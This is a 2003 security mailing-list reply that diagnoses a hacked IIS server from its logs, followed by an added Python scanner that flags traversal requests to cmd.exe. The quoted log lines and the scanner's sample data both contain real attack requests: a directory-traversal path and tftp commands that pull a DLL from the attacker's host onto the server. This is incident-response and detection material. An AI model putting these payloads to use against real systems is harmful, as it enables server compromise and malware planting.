Security Incidents mailing list archives
Re: Hacked web server
From: Michael Katz <mike () procinct com>
Date: Sun, 12 Jan 2003 18:20:12 -0800
At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
Hi... my web server (NT 4.0 SP6a) was hacked last Friday
Rogelio,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
The above shows that your server is susceptible to a vulnerability detailed in Microsoft Security Bulletin MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This vulnerability is NOT fixed by Service Pack 6a. You need to install additional patches for IIS. When you rebuild the server, you should install the cumulative IIS patch described in Microsoft Security Bulletin MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp).
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
Your failure to find a virus (httpodbc.dll) on your hard disk may indicate that your firewall was configured properly or that antivirus software prevented the infected file from being written to your hard disk (if you had antivirus software with relatively current definitions). However, there are plenty of other bad things that could be on your system that attackers could have placed on your system that would not be flagged as malware by antivirus software.
I have read that it could be because of Nimda, but I have scanned with the latest pattern and it found no viruses... only a backdoor trojan called ncx99.exe dropped in mailroot\drop\temp. By the way, can I delete files inside that folder??? There's a rundlls32.exe... a KEY file, etcetera...
ncx99.exe is most likely a modified version of netcat and is not flagged by most antivirus software as malware.
If your machine has been configured this way for two months, you should rebuild it and start from scratch. Who knows what attackers may have done to your system?
Michael Katz
mike () procinct com
Procinct Security
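As an added example (not part of the thread), a small Python scanner for Microsoft-IIS-format log lines like the ones quoted above: it decodes the request path the way IIS did after its path check (so `..%5c..` becomes `..\..`), flags traversal requests that reach cmd.exe, records whether the request got a 200, and pulls the tftp source and fetched file name out of the query for follow-up. The sample log lines, host names and addresses are constructed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample lines in the Microsoft IIS log format (comma-separated),
# modelled on the entries quoted in the thread; addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5, -, 5/01/03, 4:15:09, W3SVC, WEB01, 198.51.100.7, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
203.0.113.5, -, 5/01/03, 4:15:09, W3SVC, WEB01, 198.51.100.7, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20203.0.113.5%20GET%20cool.dll%20c:\\httpodbc.dll,
203.0.113.5, -, 5/01/03, 4:15:12, W3SVC, WEB01, 198.51.100.7, 10, 80, 1200, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
198.51.100.9, -, 5/01/03, 4:16:00, W3SVC, WEB01, 198.51.100.7, 15, 90, 4000, 200, 0, GET, /index.htm, -,
"""

# Field order of the Microsoft IIS log format used in the quoted entries.
FIELDS = ["client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "bytes_recv", "bytes_sent", "status", "win32_status",
          "method", "uri", "query"]

# '..' followed by a slash or backslash, checked on the DECODED path.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.[\\/]")
TFTP_FETCH = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)", re.I)

def parse_line(line):
    """Split one IIS-format line into a dict; returns None for malformed lines."""
    parts = [p.strip() for p in line.split(",")]
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def classify(rec):
    """Return a finding for a traversal request reaching cmd.exe, else None."""
    path = unquote(rec["uri"])  # %5c -> '\', as IIS decoded it after the check
    if not (TRAVERSAL.search(path) and path.lower().endswith("cmd.exe")):
        return None
    command = unquote_plus(rec["query"])  # '+' and %20 both become spaces
    finding = {"client": rec["client_ip"], "time": rec["date"] + " " + rec["time"],
               "command": command, "succeeded": rec["status"] == "200", "fetched": None}
    m = TFTP_FETCH.search(command)
    if m:  # the attacker pulled a file onto the server: note source, name, destination
        finding["fetched"] = {"from": m.group(1), "file": m.group(2), "dest": m.group(3)}
    return finding

def scan(log_text):
    """Run classify() over every non-empty line and return the findings in order."""
    recs = (parse_line(line) for line in log_text.splitlines() if line.strip())
    return [f for f in (classify(r) for r in recs if r) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests that were logged with a non-200 status are still reported, since a failed attempt is worth seeing in a timeline even when it fetched nothing.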
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com